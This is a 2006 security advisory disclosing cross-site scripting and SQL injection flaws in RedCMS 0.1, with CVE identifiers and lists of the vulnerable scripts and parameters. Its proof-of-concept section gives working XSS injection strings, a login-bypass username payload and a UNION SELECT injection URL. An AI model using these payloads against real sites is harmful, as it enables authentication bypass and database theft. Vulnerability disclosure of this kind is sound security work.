Multiple XSS and SQL Injection in RedCMS
Summary
- Vulnerability
- Multiple XSS and SQL Injection in RedCMS
- Discovered
- 2006.03.30
- Last Update
- 2006.04.09 Exploitation code published
- ID
- EV0115
- CVE
- CVE-2006-1568 CVE-2006-1569
- Risk Level
- medium
- Type
- Multiple Vulnerabilities
- Status
- Unpatched. No reply from developer(s)
- Vendor
- n/a
- Vulnerable Software
- RedCMS (http://redcms.co.uk/)
- Version
- 0.1
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple Vulnerabilities found in RedCMS (http://redcms.co.uk/) script.
1. Multiple Cross-Site Scripting Vulnerabilities.
Vulnerable Script:register.php
Parameters email, location, website are not properly sanitized. This can be used to post arbitrary HTML or web script code.
2. Multiple SQL Injections.
Vulnerable scripts: </p><p>login.php</p><p>profile.php</p><p>register.php</p><p>...</p>
Variables $username(login.php), $password(login.php), $u(profile.php), $username(register.php), $password(register.php),... All user-defined variables are not properly sanitized before being used in SQL queries. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc = off
PoC/Exploit
1. Cross-Site Scripting Example.
URL: http://[host]/redcms/register.php
Email: aaa'>[XSS]<aaa aaa=';
Location: aaa'>[XSS]<aaa aaa=';
Website: aaa'>[XSS]<aaa aaa=';
2. SQL Injection Examples.
URL: http://[host]/redcms/login.php
Username: ' or 1/*
Password: any
URL: http://[host]/redcms/profile.php? id=99'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,161,7,18,19,20/*
Solution.
Solution for "Multiple XSS and SQL Injection in RedCMS" is not available. Check vendor's website for updates.